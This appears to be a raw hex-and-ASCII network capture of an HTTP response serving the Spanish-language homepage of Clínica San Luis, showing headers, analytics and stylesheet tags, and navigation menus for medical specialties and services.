                                                                                                                                                                                                                                                        2023-10-09 13:51:05 UTC2604INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 61 73 34 64 4c 5a 46 68 76 66 6a 77 70 47 6e 4b 63 4b 65 63 37 77 78 70 47 64 6a 66 56 77 6f 6c 56 62 64 6c 43 76 56 61 25 32 46 39 4d 44 69 25 32 46 66 65 70 73 79 76 63 41 57 6a 39 54 46 77 42 32 4d 78 54 25 32 42 76 52 73 39 6d 68 51 58 72 5a 75 71 25 32 42 42 6f 69 63 72 33 39 74 58 37 62 37 32 77 58 72 4a 51 6f 33 62 52 62 33 75 57 45 6f 74 42 74 59 72 61 5a 48 65 38 51 49 6b 75 6a 4d 73 69 79 66 61 4b 62 5a 63 4e 46 68 4d 6c 30 52 6e 68 52 6a 4f 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78
                                                                                                                                                                                                                                                        Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=as4dLZFhvfjwpGnKcKec7wxpGdjfVwolVbdlCvVa%2F9MDi%2FfepsyvcAWj9TFwB2MxT%2BvRs9mhQXrZuq%2BBoicr39tX7b72wXrJQo3bRb3uWEotBtYraZHe8QIkujMsiyfaKbZcNFhMl0RnhRjO"}],"group":"cf-nel","max
                                                                                                                                                                                                                                                        2023-10-09 13:51:05 UTC2605INData Raw: 37 66 66 39 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 0a 0a 20 20 20 20 3c 21 2d 2d 20 47 6c 6f 62 61 6c 20 53 69 74 65 20 54 61 67 20 28 67 74 61 67 2e 6a 73 29 20 2d 20 47 6f 6f 67 6c 65 20 41 6e 61 6c 79 74 69 63 73 20 2d 2d 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 47 2d 31 53 35 53 4d 45 44 48 33 4b 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61
                                                                                                                                                                                                                                                        Data Ascii: 7ff9<!doctype html><html lang="es"><head> ... Global Site Tag (gtag.js) - Google Analytics --> <script async src="https://www.googletagmanager.com/gtag/js?id=G-1S5SMEDH3K"></script> <script> window.dataLayer = window.dataLa
                                                                                                                                                                                                                                                        2023-10-09 13:51:05 UTC2606INData Raw: 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 69 6d 61 67 65 73 2f 73 65 6f 2f 73 65 6f 2d 6d 65 74 61 64 61 74 61 2d 73 69 74 65 2d 36 34 39 2e 6a 70 67 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6c c3 ad 6e 69 63 61 20 53 61 6e 20 4c 75 c3 ad 73 20 70 61 72 61 20 6c 61 20 6d 75 6a 65 72 20 79 20 65 6c 20 6e 69 c3 b1 6f 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 50 72 65 73 65 72 76 61 6d 6f 73 20 6c 61 20 76 69 64 61 20 64 65 20 6c 61 20 6d 75 6a 65 72 20 79 20 65 6c 20 6e 69 c3 b1 6f 20 61 20 74 72 61 76 c3 a9
                                                                                                                                                                                                                                                        Data Ascii: content="https://www.clinicasanluis.com.co/images/seo/seo-metadata-site-649.jpg"><meta property="og:title" content="Clnica San Lus para la mujer y el nio"><meta property="og:description" content="Preservamos la vida de la mujer y el nio a trav
                                                                                                                                                                                                                                                        2023-10-09 13:51:05 UTC2607INData Raw: 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 77 67 68 74 40 34 30 30 3b 36 30 30 3b 37 30 30 26 66 61 6d 69 6c 79 3d 52 75 62 69 6b 3a 77 67 68 74 40 34 30 30 3b 35 30 30 3b 36 30 30 3b 37 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 3e 0a 3c 2f 6e 6f 73 63 72 69 70 74 3e 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 61 73 3d 22 73 74 79 6c 65 22 0a 20 20 20 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 77 67 68 74 40 34 30 30 3b 35 30 30 3b 37 30 30 3b 39 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 0a 20 20 20 20 6f 6e 6c 6f 61 64 3d 22 74 68 69 73 2e 6f 6e 6c 6f 61 64 3d 6e 75 6c 6c 3b 74 68 69 73 2e
                                                                                                                                                                                                                                                        Data Ascii: ?family=Open+Sans:wght@400;600;700&family=Rubik:wght@400;500;600;700&display=swap"></noscript><link rel="preload" as="style" href="https://fonts.googleapis.com/css2?family=Roboto:wght@400;500;700;900&display=swap" onload="this.onload=null;this.
                                                                                                                                                                                                                                                        2023-10-09 13:51:05 UTC2609INData Raw: 20 50 6f 70 75 70 20 43 53 53 20 2d 2d 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 61 73 73 65 74 73 2f 63 73 73 2f 6d 61 67 6e 69 66 69 63 2d 70 6f 70 75 70 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 21 2d 2d 20 49 63 6f 6e 73 20 43 53 53 20 2d 2d 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 61 73 73 65 74 73 2f 66 6f 6e 74 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 63 73 73 2f 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c
                                                                                                                                                                                                                                                        Data Ascii: Popup CSS --><link rel="stylesheet" href="https://www.clinicasanluis.com.co/assets/css/magnific-popup.min.css">... Icons CSS --><link rel="stylesheet" href="https://www.clinicasanluis.com.co/assets/fonts/font-awesome/css/all.min.css"><link rel="styl
                                                                                                                                                                                                                                                        2023-10-09 13:51:05 UTC2610INData Raw: 79 3d 22 6e 6f 2d 72 65 66 65 72 72 65 72 22 20 6f 6e 6c 6f 61 64 3d 22 74 68 69 73 2e 6f 6e 6c 6f 61 64 3d 6e 75 6c 6c 3b 74 68 69 73 2e 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 22 20 2f 3e 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 73 6c 69 63 6b 2d 63 61 72 6f 75 73 65 6c 2f 31 2e 38 2e 31 2f 73 6c 69 63 6b 2d 74 68 65 6d 65 2e 63 73 73 22 0a 20 20 20 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 35 31 32 2d 36 6c 4c 55 64 65 51 35 75 68 65 4d 46 62 57 6d 33 43 50 32 37 31 6c 31 34 52 73 58 31 78 74 78 2b 4a 35 78 32 79 65 49 44 6b 6b 69 42 70 65 56 54 4e 68 54 71 69 6a 4d 45 37 47
                                                                                                                                                                                                                                                        Data Ascii: y="no-referrer" onload="this.onload=null;this.rel='stylesheet'" /><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/slick-carousel/1.8.1/slick-theme.css" integrity="sha512-6lLUdeQ5uheMFbWm3CP271l14RsX1xtx+J5x2yeIDkkiBpeVTNhTqijME7G
                                                                                                                                                                                                                                                        2023-10-09 13:51:05 UTC2611INData Raw: 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 74 68 65 6d 65 73 2f 64 61 6d 6f 73 66 72 6f 6e 74 65 6e 64 2f 72 65 76 6f 6c 75 74 69 6f 6e 2f 63 73 73 2f 6e 61 76 69 67 61 74 69 6f 6e 2e 63 73 73 22 20 2f 3e 0a 20 20 20 20 3c 2f 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 21 2d 2d 20 52 45 56 4f 4c 55 54 49 4f 4e 20 53 4c 49 44 45 52 20 43 55 53 54 4f 4d 20 43 53 53 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 74 68 65 6d 65 73 2f 64 61 6d 6f 73 66 72
                                                                                                                                                                                                                                                        Data Ascii: css" href="https://www.clinicasanluis.com.co/themes/damosfrontend/revolution/css/navigation.css" /> </noscript> ... REVOLUTION SLIDER CUSTOM CSS --> <link rel="stylesheet" type="text/css" href="https://www.clinicasanluis.com.co/themes/damosfr
                                                                                                                                                                                                                                                        2023-10-09 13:51:05 UTC2613INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 62 20 66 61 2d 69 6e 73 74 61 67 72 61 6d 22 3e 3c 2f 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63
                                                                                                                                                                                                                                                        Data Ascii: <i class="fab fa-instagram"></i> </a> </li> </ul> </div> </div> <div c
                                                                                                                                                                                                                                                        2023-10-09 13:51:05 UTC2614INData Raw: 2f 75 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 71 2d 62 6f 74 74 6f 6d 2d 68 65 61 64 65 72 20 70 71 2d 68 61 73 2d 73 74 69 63 6b 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 2d 63 75 73 74 6f 6d 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6c 67 2d 31 32
                                                                                                                                                                                                                                                        Data Ascii: /ul> </div> </div> </div> </div> </div> <div class="pq-bottom-header pq-has-sticky"> <div class="container-custom"> <div class="row"> <div class="col-lg-12
                                                                                                                                                                                                                                                        2023-10-09 13:51:05 UTC2615INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 22 3e 3c 61 20 68 72 65 66 3d 22 6e 6f 73 6f 74 72 6f 73 2f 6d 69 73 69 6f 6e 2d 79 2d 76 69 73 69 6f 6e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 4d 69 73 69 c3 b3 6e 20 79 20 56 69 73 69 c3 b3 6e 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: <li class="menu-item "><a href="nosotros/mision-y-vision" target="_self">Misin y Visin</a></li>
                                                                                                                                                                                                                                                        2023-10-09 13:51:05 UTC2617INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 22 3e 3c 61 20 68 72 65 66 3d 22 6e 6f 73 6f 74 72 6f 73 2f 67 6f 62 69 65 72 6e 6f 2d 63 6f 72 70 6f 72 61 74 69 76 6f 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 47 6f 62 69 65 72 6e 6f 20 43 6f 72 70 6f 72 61 74 69 76 6f 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: <li class="menu-item "><a href="nosotros/gobierno-corporativo" target="_self">Gobierno Corporativo</a></li>
                                                                                                                                                                                                                                                        2023-10-09 13:51:05 UTC2618INData Raw: 22 6e 6f 73 6f 74 72 6f 73 2f 66 75 6e 64 61 63 69 6f 6e 2d 73 61 6e 2d 6c 75 69 73 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 46 75 6e 64 61 63 69 c3 b3 6e 20 53 61 6e 20 4c 75 69 73 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 20 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 74 61 62 69 6e
                                                                                                                                                                                                                                                        Data Ascii: "nosotros/fundacion-san-luis" target="_self">Fundacin San Luis</a></li> </ul> </li> <li class="menu-item "> <a tabin
                                                                                                                                                                                                                                                        2023-10-09 13:51:05 UTC2619INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 22 3e 3c 61 20 68 72 65 66 3d 22 65 73 70 65 63 69 61 6c 69 64 61 64 65 73 2f 70 65 64 69 61 74 72 69 63 61 73 2f 69 6e 66 65 63 74 6f 6c 6f 67 69 61 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 49 6e 66 65 63 74 6f 6c 6f 67 c3 ad 61 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75
                                                                                                                                                                                                                                                        Data Ascii: <li class="menu-item "><a href="especialidades/pediatricas/infectologia" target="_self">Infectologa</a></li> <li class="menu
                                                                                                                                                                                                                                                        2023-10-09 13:51:05 UTC2621INData Raw: 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 22 3e 3c 61 20 68 72 65 66 3d 22 65 73 70 65 63 69 61 6c 69 64 61 64 65 73 2f 70 65 64 69 61 74 72 69 63 61 73 2f 72 61 64 69 6f 6c 6f 67 69 61 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 52 61 64 69 6f 6c 6f 67 c3 ad 61 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 22 3e 3c 61 20 68 72 65 66 3d 22 65 73 70 65 63 69 61 6c 69
                                                                                                                                                                                                                                                        Data Ascii: lass="menu-item "><a href="especialidades/pediatricas/radiologia" target="_self">Radiologa</a></li> <li class="menu-item "><a href="especiali
                                                                                                                                                                                                                                                        2023-10-09 13:51:05 UTC2622INData Raw: 3d 22 65 73 70 65 63 69 61 6c 69 64 61 64 65 73 2f 70 65 64 69 61 74 72 69 63 61 73 2f 6e 65 75 6d 6f 6c 6f 67 69 61 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 4e 65 75 6d 6f 6c 6f 67 c3 ad 61 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: ="especialidades/pediatricas/neumologia" target="_self">Neumologa</a></li> </ul> </li>
                                                                                                                                                                                                                                                        2023-10-09 13:51:05 UTC2623INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 20 6d 65 67 61 2d 6d 65 6e 75 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 74 61 62 69 6e 64 65 78 3d 30 3e 20 53 65 72 76 69 63 69 6f 73 3c 2f 61 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 63 68 65 76 72 6f 6e 2d 64 6f 77 6e 20 70 71 2d 73 75 62 6d 65 6e 75 2d 69 63 6f 6e 22 3e 3c 2f 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 73 75 62
                                                                                                                                                                                                                                                        Data Ascii: </ul> </li> <li class="menu-item mega-menu"> <a tabindex=0> Servicios</a><i class="fa fa-chevron-down pq-submenu-icon"></i> <ul class="sub
                                                                                                                                                                                                                                                        2023-10-09 13:51:05 UTC2625INData Raw: 22 5f 73 65 6c 66 22 3e 4c 61 70 61 72 6f 73 63 c3 b3 70 69 63 61 20 65 20 68 69 73 74 65 72 6f 73 63 c3 b3 70 69 63 61 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 22 3e 3c 61 20 68 72 65 66 3d 22 73 65 72 76 69 63 69 6f 73 2f 63 69 72 75 67 69 61 2f 63 61 72 64 69 6f 76 61 73 63 75 6c 61 72 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 43 61 72 64 69 6f 76 61 73 63 75 6c
                                                                                                                                                                                                                                                        Data Ascii: "_self">Laparoscpica e histeroscpica</a></li> <li class="menu-item "><a href="servicios/cirugia/cardiovascular" target="_self">Cardiovascul
                                                                                                                                                                                                                                                        2023-10-09 13:51:05 UTC2626INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 22 3e 3c 61 20 68 72 65 66 3d 22 73 65 72 76 69 63 69 6f 73 2f 63 69 72 75 67 69 61 2f 70 65 64 69 61 74 72 69 63 61 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 50 65 64 69 c3 a1 74 72 69 63 61 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 22 3e 3c 61 20 68 72 65
                                                                                                                                                                                                                                                        Data Ascii: <li class="menu-item "><a href="servicios/cirugia/pediatrica" target="_self">Peditrica</a></li> <li class="menu-item "><a hre
                                                                                                                                                                                                                                                        2023-10-09 13:51:05 UTC2627INData Raw: 6f 73 2d 6f 64 6f 6e 74 6f 6c 6f 67 69 63 6f 73 2d 62 61 6a 6f 2d 61 6e 65 73 74 65 73 69 61 2d 67 65 6e 65 72 61 6c 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 50 72 6f 63 65 64 69 6d 69 65 6e 74 6f 73 20 6f 64 6f 6e 74 6f 6c c3 b3 67 69 63 6f 73 20 62 61 6a 6f 20 61 6e 65 73 74 65 73 69 61 20 67 65 6e 65 72 61 6c 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c
                                                                                                                                                                                                                                                        Data Ascii: os-odontologicos-bajo-anestesia-general" target="_self">Procedimientos odontolgicos bajo anestesia general</a></li> </ul> </l
                                                                                                                                                                                                                                                        2023-10-09 13:51:05 UTC2629INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 22 3e 3c 61 20 68 72 65 66 3d 22 73 65 72 76 69 63 69 6f 73 2f 75 6e 69 64 61 64 2d 64 65 2d 68 65 6d 61 74 6f 2d 6f 6e 63 6f 6c 6f 67 69 61 2d 70 65 64 69 61 74 72 69 63 61 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 55 6e 69 64 61 64 20 64 65 20 68 65 6d 61 74 6f 20 e2 80 93 20 6f 6e 63 6f 6c 6f 67 c3 ad 61 20 70 65 64 69 c3 a1 74 72 69 63 61 3c 2f 61 3e 3c 2f 6c
                                                                                                                                                                                                                                                        Data Ascii: <li class="menu-item "><a href="servicios/unidad-de-hemato-oncologia-pediatrica" target="_self">Unidad de hemato oncologa peditrica</a></l
                                                                                                                                                                                                                                                        2023-10-09 13:51:05 UTC2630INData Raw: 6f 73 2f 61 70 6f 79 6f 2d 64 69 61 67 6e 6f 73 74 69 63 6f 2f 73 65 72 76 69 63 69 6f 2d 74 72 61 6e 73 66 75 73 69 6f 6e 61 6c 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 3e 53 65 72 76 69 63 69 6f 20 74 72 61 6e 73 66 75 73 69 6f 6e 61 6c 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 22 3e 3c 61 20 68 72 65 66 3d 22 73 65 72 76 69 63 69 6f 73 2f 61 70 6f 79 6f 2d 64 69 61
                                                                                                                                                                                                                                                        Data Ascii: os/apoyo-diagnostico/servicio-transfusional" target="_self">Servicio transfusional</a></li> <li class="menu-item "><a href="servicios/apoyo-dia
